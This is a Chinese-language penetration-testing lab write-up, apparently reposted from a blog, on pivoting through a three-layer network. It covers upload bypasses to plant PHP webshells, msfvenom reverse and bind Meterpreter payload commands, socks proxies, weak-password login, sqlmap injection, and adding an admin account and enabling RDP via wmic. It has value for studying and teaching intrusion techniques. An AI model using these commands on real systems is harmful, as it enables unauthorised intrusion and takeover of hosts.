三层网络渗透测试实验 必须收藏

admin 2022年2月24日02:18:30安全文章评论37 views2025字阅读6分45秒阅读模式

声明:此次渗透环境为实验环境,仅供渗透实验学校参考

前言

在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢?
利用这个实验我们就可以更清晰的了解多层网络渗透测试的过程。并了解通过msf进行内网渗透,由一级代理到二级代理的搭建来进行对三层网络的渗透的过程。


【三层网络拓扑图】

三层网络渗透测试实验 必须收藏


【第一层主机】

目标ip:192.168.31.207
访问目标ip发现是一个文件上传页面


三层网络渗透测试实验 必须收藏


经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径


三层网络渗透测试实验 必须收藏


访问返回的文件路径,成功连接到php大马


三层网络渗透测试实验 必须收藏


查看ip发现该主机是双网卡,第二层网络段为192.168.1.0/24


三层网络渗透测试实验 必须收藏


为进一步进行内网渗透,我们上传msf后门
后门制作:


1.msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.207 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf


将后门上传到第一层主机192.168.31.207


设置msf监听


三层网络渗透测试实验 必须收藏


在第一层主机上运行shell.elf

Chmod 777 shell.elf./shell.elf

msf获得meterpreter


三层网络渗透测试实验 必须收藏


将第一层的meterpreter切换到后台运行


1.background


三层网络渗透测试实验 必须收藏


【第二层主机】

利用第一层的meterpreter添加第二层的路由


1.run autoroute -s 192.168.1.0/24


三层网络渗透测试实验 必须收藏


扫描发现第二层主机ip为192.168.1.100

接着利用msf搭建socks代理,好让攻击机直接打第二层网络:

1.use auxiliary/server/socks4a


三层网络渗透测试实验 必须收藏


设置好代理后访问192.168.1.100成功访问到网站


三层网络渗透测试实验 必须收藏


利用弱口令admin/admin登录到后台

在设置处发现可修改允许上传文件的类型,修改后保存设置


三层网络渗透测试实验 必须收藏


在撰写新文章处添加附件可直接上传php脚本


三层网络渗透测试实验 必须收藏


成功连接到php大马


三层网络渗透测试实验 必须收藏


为了打开第三层,我们需要在第二层主机上传msf后门
制作后门:

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf


利用大马上传,并在第二层主机上运行

chmod 777 ding.elf./ding.elf

设置msf相关配置


三层网络渗透测试实验 必须收藏


成功获取到第二层主机meterpreter


三层网络渗透测试实验 必须收藏


查看ip发现第三层网段为192.168.2.0/24


三层网络渗透测试实验 必须收藏


利用第二层主机的meterpreter添加第三层的网络路由


三层网络渗透测试实验 必须收藏


启用一个socks4a代理给第三层网络,端口设置为2334


三层网络渗透测试实验 必须收藏


然后在配置文件中加上


1.socks4 192.168.31.119  2334


三层网络渗透测试实验 必须收藏


利用获得的meterpreter发现第三层目标主机为192.16.2.100


三层网络渗透测试实验 必须收藏


【第三层主机】

使用代理打开Firefox访问第三层主机ip192.168.2.100


三层网络渗透测试实验 必须收藏


通过测试发现http://192.168.2.100/category.php?cat_id=1处存在sql注入


三层网络渗透测试实验 必须收藏


利用proxychains跑一下sqlmap


1.proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"


三层网络渗透测试实验 必须收藏


成功注出后台账号和加密的密码


三层网络渗透测试实验 必须收藏


发现管理员密码解不开,

利用nmap扫描网站后台路径。

1.proxychains nmap --script http-enum -p80 192.168.2.100

三层网络渗透测试实验 必须收藏


发现有个上传点

三层网络渗透测试实验 必须收藏


测试发现该上传点是前端检测,利用JavaScript绕过即可上传成功

三层网络渗透测试实验 必须收藏


访问/upload/uploads/webshelldama.php成功连接到php大马


三层网络渗透测试实验 必须收藏


利用大马查看发现是windows2003系统

三层网络渗透测试实验 必须收藏


添加用户账号密码


三层网络渗透测试实验 必须收藏


将添加的用户账号密码添加到管理组


三层网络渗透测试实验 必须收藏


利用大马开启3389端口


1.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1


三层网络渗透测试实验 必须收藏


成功开启3389端口


三层网络渗透测试实验 必须收藏


利用添加的管理员账号密码成功登录到远程桌面


三层网络渗透测试实验 必须收藏



作者:weixin_44991517

原文链接:https://blog.csdn.net/weixin_44991517/article/details/92764972


历史文章推荐:

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

内网渗透之域渗透命令执行总结

[WEB安全]Weblogic漏洞总结


查看更多精彩内容,还请关注橘猫学安全

每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽三层网络渗透测试实验 必须收藏

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月24日02:18:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  三层网络渗透测试实验 必须收藏 http://cn-sec.com/archives/800606.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: